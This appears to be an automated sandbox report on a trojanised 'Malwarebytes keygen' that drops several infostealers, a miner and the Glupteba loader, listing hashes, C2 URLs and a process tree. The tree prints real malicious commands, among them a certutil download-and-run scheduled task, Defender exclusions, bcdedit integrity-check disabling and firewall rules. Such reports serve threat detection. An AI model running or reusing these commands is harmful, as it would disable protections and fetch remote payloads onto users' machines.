Analysis

  • max time kernel
    600s
  • max time network
    600s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-03-2021 14:18

General

  • Target

    Malwarebytes.1.51.2.1300.dat.keygen.exe

  • Size

    4.9MB

  • MD5

    6ec6061139ce3258bf85c06faeac465d

  • SHA1

    4d7121c979e8a29e33782e65ade97f64d5ae3059

  • SHA256

    064411322a8199fe1e2a08ca64f5f06240b2489c1177334e6896e8b469536d3a

  • SHA512

    f4457fb35573a7debdb2fe13c9fa8da2449020e794553f68971b842aa702a6fb3780539c39d47e4ed0933ab6fe64cea9c2b46e96e0079baf0f78181f835b3815

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

dfa7b4d385486b737f84d608857eb43733ffd299

Attributes
  • url4cnc

    https://telete.in/j9ca1pel

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • XMRig Miner Payload 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 62 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 4 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 17 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Script User-Agent 22 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Malwarebytes.1.51.2.1300.dat.keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Malwarebytes.1.51.2.1300.dat.keygen.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3920
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2108
    • C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe
      "C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1896
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2376
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              5⤵
                PID:1632
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:1592
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
            keygen-step-3.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2416
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3748
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                5⤵
                • Runs ping.exe
                PID:4084
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1336
            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1952
              • C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                5⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2440
                • C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe" 1 3.1616249959.60560467e8ac4 101
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:4736
                  • C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\T3IMXUUFS4\multitimer.exe" 2 3.1616249959.60560467e8ac4
                    7⤵
                    • Executes dropped EXE
                    • Checks for any installed AV software in registry
                    • Maps connected drives based on registry
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4832
                    • C:\Users\Admin\AppData\Local\Temp\zn2t3dpjgwb\xruuxrgp4rw.exe
                      "C:\Users\Admin\AppData\Local\Temp\zn2t3dpjgwb\xruuxrgp4rw.exe" /ustwo INSTALL
                      8⤵
                      • Executes dropped EXE
                      PID:3232
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /im "xruuxrgp4rw.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zn2t3dpjgwb\xruuxrgp4rw.exe" & exit
                        9⤵
                          PID:5944
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /im "xruuxrgp4rw.exe" /f
                            10⤵
                            • Kills process with taskkill
                            PID:3408
                      • C:\Users\Admin\AppData\Local\Temp\vyaxb1z5wlc\fppmbyy0axk.exe
                        "C:\Users\Admin\AppData\Local\Temp\vyaxb1z5wlc\fppmbyy0axk.exe" /VERYSILENT
                        8⤵
                        • Executes dropped EXE
                        PID:3564
                        • C:\Users\Admin\AppData\Local\Temp\is-GFLVH.tmp\fppmbyy0axk.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-GFLVH.tmp\fppmbyy0axk.tmp" /SL5="$5027E,2592217,780800,C:\Users\Admin\AppData\Local\Temp\vyaxb1z5wlc\fppmbyy0axk.exe" /VERYSILENT
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious use of FindShellTrayWindow
                          PID:4712
                          • C:\Users\Admin\AppData\Local\Temp\is-0BSEG.tmp\winlthsth.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-0BSEG.tmp\winlthsth.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:5436
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 792
                              11⤵
                              • Program crash
                              PID:4680
                      • C:\Users\Admin\AppData\Local\Temp\bpynzgou1yg\AwesomePoolU1.exe
                        "C:\Users\Admin\AppData\Local\Temp\bpynzgou1yg\AwesomePoolU1.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:2352
                      • C:\Users\Admin\AppData\Local\Temp\gx2ap11yzsg\Setup3310.exe
                        "C:\Users\Admin\AppData\Local\Temp\gx2ap11yzsg\Setup3310.exe" /Verysilent /subid=577
                        8⤵
                        • Executes dropped EXE
                        PID:2356
                        • C:\Users\Admin\AppData\Local\Temp\is-LCSTU.tmp\Setup3310.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-LCSTU.tmp\Setup3310.tmp" /SL5="$203A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\gx2ap11yzsg\Setup3310.exe" /Verysilent /subid=577
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of FindShellTrayWindow
                          PID:1484
                          • C:\Users\Admin\AppData\Local\Temp\is-HK2T6.tmp\Setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-HK2T6.tmp\Setup.exe" /Verysilent
                            10⤵
                            • Executes dropped EXE
                            PID:5920
                            • C:\Users\Admin\AppData\Local\Temp\is-MNK85.tmp\Setup.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-MNK85.tmp\Setup.tmp" /SL5="$20594,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HK2T6.tmp\Setup.exe" /Verysilent
                              11⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:6000
                              • C:\Users\Admin\AppData\Local\Temp\is-0V4QP.tmp\Delta.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-0V4QP.tmp\Delta.exe" /Verysilent
                                12⤵
                                • Executes dropped EXE
                                PID:5416
                                • C:\Users\Admin\AppData\Local\Temp\is-QA743.tmp\Delta.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-QA743.tmp\Delta.tmp" /SL5="$302FA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-0V4QP.tmp\Delta.exe" /Verysilent
                                  13⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  PID:3512
                              • C:\Users\Admin\AppData\Local\Temp\is-0V4QP.tmp\hjjgaa.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-0V4QP.tmp\hjjgaa.exe" /Verysilent
                                12⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:1500
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  13⤵
                                  • Executes dropped EXE
                                  PID:5468
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  13⤵
                                  • Executes dropped EXE
                                  PID:5544
                      • C:\Users\Admin\AppData\Local\Temp\z4fcvjgbqpy\vpn.exe
                        "C:\Users\Admin\AppData\Local\Temp\z4fcvjgbqpy\vpn.exe" /silent /subid=482
                        8⤵
                        • Executes dropped EXE
                        PID:4916
                        • C:\Users\Admin\AppData\Local\Temp\is-H0JAL.tmp\vpn.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-H0JAL.tmp\vpn.tmp" /SL5="$10404,15170975,270336,C:\Users\Admin\AppData\Local\Temp\z4fcvjgbqpy\vpn.exe" /silent /subid=482
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Modifies system certificate store
                          • Suspicious use of FindShellTrayWindow
                          PID:5060
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                            10⤵
                              PID:5740
                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                tapinstall.exe remove tap0901
                                11⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:6052
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                              10⤵
                                PID:2028
                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                  tapinstall.exe install OemVista.inf tap0901
                                  11⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Drops file in Windows directory
                                  • Checks SCSI registry key(s)
                                  • Modifies system certificate store
                                  PID:4056
                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                10⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4952
                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                10⤵
                                • Executes dropped EXE
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:1924
                          • C:\Users\Admin\AppData\Local\Temp\4awfh2brfcz\askinstall24.exe
                            "C:\Users\Admin\AppData\Local\Temp\4awfh2brfcz\askinstall24.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4784
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              9⤵
                                PID:5252
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  10⤵
                                  • Kills process with taskkill
                                  PID:5508
                            • C:\Users\Admin\AppData\Local\Temp\5rxkahbu0kp\vict.exe
                              "C:\Users\Admin\AppData\Local\Temp\5rxkahbu0kp\vict.exe" /VERYSILENT /id=535
                              8⤵
                              • Executes dropped EXE
                              PID:4776
                            • C:\Users\Admin\AppData\Local\Temp\3cojornegtc\IBInstaller_97039.exe
                              "C:\Users\Admin\AppData\Local\Temp\3cojornegtc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                              8⤵
                              • Executes dropped EXE
                              PID:4104
                              • C:\Users\Admin\AppData\Local\Temp\is-65M45.tmp\IBInstaller_97039.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-65M45.tmp\IBInstaller_97039.tmp" /SL5="$204D8,14468169,721408,C:\Users\Admin\AppData\Local\Temp\3cojornegtc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                9⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                • Suspicious use of FindShellTrayWindow
                                PID:4980
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                  10⤵
                                  • Checks computer location settings
                                  PID:192
                                • C:\Users\Admin\AppData\Local\Temp\is-K0DKV.tmp\{app}\chrome_proxy.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-K0DKV.tmp\{app}\chrome_proxy.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4228
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-K0DKV.tmp\{app}\chrome_proxy.exe"
                                    11⤵
                                      PID:4708
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping localhost -n 4
                                        12⤵
                                        • Runs ping.exe
                                        PID:6044
                              • C:\Users\Admin\AppData\Local\Temp\h4wpr2ihvdm\app.exe
                                "C:\Users\Admin\AppData\Local\Temp\h4wpr2ihvdm\app.exe" /8-23
                                8⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                PID:4868
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Weathered-Pond"
                                  9⤵
                                    PID:5176
                                  • C:\Program Files (x86)\Weathered-Pond\7za.exe
                                    "C:\Program Files (x86)\Weathered-Pond\7za.exe" e -p154.61.71.51 winamp-plugins.7z
                                    9⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:4744
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      10⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetThreadContext
                                      PID:4264
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Weathered-Pond\app.exe" -map "C:\Program Files (x86)\Weathered-Pond\WinmonProcessMonitor.sys""
                                    9⤵
                                      PID:5320
                                      • C:\Program Files (x86)\Weathered-Pond\app.exe
                                        "C:\Program Files (x86)\Weathered-Pond\app.exe" -map "C:\Program Files (x86)\Weathered-Pond\WinmonProcessMonitor.sys"
                                        10⤵
                                          PID:4692
                                      • C:\Program Files (x86)\Weathered-Pond\7za.exe
                                        "C:\Program Files (x86)\Weathered-Pond\7za.exe" e -p154.61.71.51 winamp.7z
                                        9⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        PID:5136
                                      • C:\Program Files (x86)\Weathered-Pond\app.exe
                                        "C:\Program Files (x86)\Weathered-Pond\app.exe" /8-23
                                        9⤵
                                        • Executes dropped EXE
                                        PID:4840
                                        • C:\Program Files (x86)\Weathered-Pond\app.exe
                                          "C:\Program Files (x86)\Weathered-Pond\app.exe" /8-23
                                          10⤵
                                          • Executes dropped EXE
                                          • Windows security modification
                                          • Adds Run key to start application
                                          • Drops file in Windows directory
                                          • Modifies data under HKEY_USERS
                                          PID:5764
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                            11⤵
                                              PID:5276
                                              • C:\Windows\system32\netsh.exe
                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                12⤵
                                                • Modifies data under HKEY_USERS
                                                PID:5812
                                            • C:\Windows\rss\csrss.exe
                                              C:\Windows\rss\csrss.exe /8-23
                                              11⤵
                                              • Drops file in Drivers directory
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: LoadsDriver
                                              PID:4692
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                12⤵
                                                • Creates scheduled task(s)
                                                PID:2388
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                12⤵
                                                • Creates scheduled task(s)
                                                PID:5000
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                12⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:5936
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:996
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:5336
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:2076
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:5956
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:4816
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:4440
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:6112
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:504
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:5216
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:1120
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:3960
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -timeout 0
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:1652
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:4120
                                                • C:\Windows\system32\bcdedit.exe
                                                  C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                                  13⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:2952
                                              • C:\Windows\System32\bcdedit.exe
                                                C:\Windows\Sysnative\bcdedit.exe /v
                                                12⤵
                                                • Modifies boot configuration data using bcdedit
                                                PID:1604
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                12⤵
                                                • Drops file in Drivers directory
                                                • Executes dropped EXE
                                                PID:4268
                                              • C:\Windows\windefender.exe
                                                "C:\Windows\windefender.exe"
                                                12⤵
                                                • Executes dropped EXE
                                                PID:5172
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                  13⤵
                                                    PID:4348
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                      14⤵
                                                        PID:4308
                                    • C:\Users\Admin\AppData\Local\Temp\OAQM2BM2AL\setups.exe
                                      "C:\Users\Admin\AppData\Local\Temp\OAQM2BM2AL\setups.exe" ll
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:3828
                                      • C:\Users\Admin\AppData\Local\Temp\is-72QNU.tmp\setups.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-72QNU.tmp\setups.tmp" /SL5="$202AC,443958,217088,C:\Users\Admin\AppData\Local\Temp\OAQM2BM2AL\setups.exe" ll
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Loads dropped DLL
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2168
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:2208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      5⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3152
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        6⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2452
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4628
                                    • C:\Users\Admin\AppData\Roaming\FB9C.tmp.exe
                                      "C:\Users\Admin\AppData\Roaming\FB9C.tmp.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4904
                                      • C:\Users\Admin\AppData\Roaming\FB9C.tmp.exe
